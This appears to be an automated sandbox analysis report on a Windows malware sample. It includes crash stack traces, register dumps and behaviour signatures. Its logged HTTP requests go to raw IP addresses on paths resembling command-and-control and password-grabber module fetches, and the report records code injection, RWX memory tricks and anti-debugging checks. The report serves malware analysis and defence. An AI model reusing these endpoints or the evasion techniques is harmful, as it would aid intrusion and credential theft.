KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x72e1f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefd6d4190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef9f6eb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef9f6ec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef9f63fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 868515839561326211
registers.r15: 38519093
registers.rcx: 0
registers.rsi: 854104880
registers.r10: 0
registers.rbx: 0
registers.rsp: 2221168
registers.r11: 0
registers.r8: 5
registers.r9: 1927993344
registers.rdx: 2
registers.r12: 2542992
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 449

__exception__

April 8, 2021, 9:16 a.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea
New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x72e1fc86
VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096
VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6
VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1
0xad4df

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 853946112
registers.r15: 867578836
registers.rcx: 27
registers.rsi: 2217136
registers.r10: 0
registers.rbx: 3
registers.rsp: 2216744
registers.r11: -125
registers.r8: 3
registers.r9: 1927998208
registers.rdx: 3
registers.r12: 854110096
registers.rbp: 3
registers.rdi: 40
registers.rax: 4
registers.r13: 0

__exception__

April 8, 2021, 9:16 a.m.

stacktrace:

RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x72e26d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x72e105bd
hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea
New_kernel32_GetTickCount+0x19 New_kernel32_GetTimeZoneInformation-0x76 @ 0x72e1c0bf
webio+0x18e4 @ 0x7fef9cc18e4
webio+0x9700 @ 0x7fef9cc9700
webio+0x969e @ 0x7fef9cc969e
WinHttpCreateUrl+0x2109 WinHttpSendRequest-0x11f winhttp+0x73b1 @ 0x7fef9f573b1
WinHttpCreateUrl+0x200c WinHttpSendRequest-0x21c winhttp+0x72b4 @ 0x7fef9f572b4
WinHttpCloseHandle-0x108f winhttp+0x1251 @ 0x7fef9f51251
WinHttpCreateUrl+0x1f73 WinHttpSendRequest-0x2b5 winhttp+0x721b @ 0x7fef9f5721b
WinHttpSetStatusCallback+0x408 WinHttpOpenRequest-0x500 winhttp+0x40f8 @ 0x7fef9f540f8
WinHttpCloseHandle+0x128 WinHttpOpen-0x1020 winhttp+0x2408 @ 0x7fef9f52408

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 2221320
registers.r15: 2221312
registers.rcx: 24
registers.rsi: 2218780
registers.r10: 0
registers.rbx: 2218992
registers.rsp: 2218336
registers.r11: -128
registers.r8: 3
registers.r9: 1927997696
registers.rdx: 3
registers.r12: 2221280
registers.rbp: 0
registers.rdi: 850803368
registers.rax: 4
registers.r13: 1994795888

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	Connection to IP address	suspicious_request	GET https://46.4.176.106/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/5/pwgrab64/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/0/Windows%207%20x64%20SP1/1106/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/t1jdnnJrdBrPpVLbtH51HHrLdR/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/10/62/VHRFBPVHNBFDXNN/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/23/100015/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/DNSBL/listed/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/1/vvLZFt95v9npxjDVLzlZn1hFVxvDxX5n/

Performs some HTTP requests (16 events)

request	GET http://myexternalip.com/text
request	GET http://wtfismyip.com/plain
request	GET http://ip.anysrc.net/?format=text
request	GET https://api.ipify.org/ip
request	GET https://api.ip.sb/
request	GET https://ident.me/raw
request	GET https://46.4.176.106/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/5/pwgrab64/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/5/file/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/0/Windows%207%20x64%20SP1/1106/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/t1jdnnJrdBrPpVLbtH51HHrLdR/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/user/test22/0/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/10/62/VHRFBPVHNBFDXNN/7/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/23/100015/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/14/DNSBL/listed/0/
request	GET https://91.243.125.5/yas58/TEST22-PC_W617601.B3B6C175B1E739275739ABB8A4FB2937/1/vvLZFt95v9npxjDVLzlZn1hFVxvDxX5n/

Allocates read-write-execute memory (usually to unpack itself) (8 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 8, 2021, 9:14 a.m.	process_identifier: 7140 region_size: 245760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00390000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 7140 region_size: 176128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 8, 2021, 9:15 a.m.	process_identifier: 5332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (4 events)

domain	api.ipify.org
domain	myexternalip.com
domain	wtfismyip.com
domain	ip.anysrc.net

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\svchost.exe
cmdline	C:\Windows\system32\cmd.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 897024 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000180001000 process_handle: 0x000000000000041c	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 8, 2021, 9:15 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00063000', u'virtual_address': u'0x00026000', u'entropy': 7.256572607359043, u'name': u'.rsrc', u'virtual_size': u'0x00062e84'}

entropy

7.25657260736

description

A section with a high entropy has been found

entropy

0.745762711864

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 8, 2021, 9:15 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess April 8, 2021, 9:15 a.m.	status_code: 0x00000000 process_identifier: 7236 process_handle: 0x000000a4
NtTerminateProcess April 8, 2021, 9:15 a.m.	status_code: 0x00000000 process_identifier: 7236 process_handle: 0x000000a4	1
NtTerminateProcess April 8, 2021, 9:16 a.m.	status_code: 0x00000000 process_identifier: 3080 process_handle: 0x00000000000003b0
NtTerminateProcess April 8, 2021, 9:16 a.m.	status_code: 0x00000000 process_identifier: 3080 process_handle: 0x00000000000003b0	1

Communicates with host for which no DNS query was performed (5 events)

host	172.217.25.14
host	173.81.4.147
host	181.143.251.154
host	46.4.176.106
host	91.243.125.5

Allocates execute permission to another process indicative of possible code injection (50 out of 315 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 1138688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
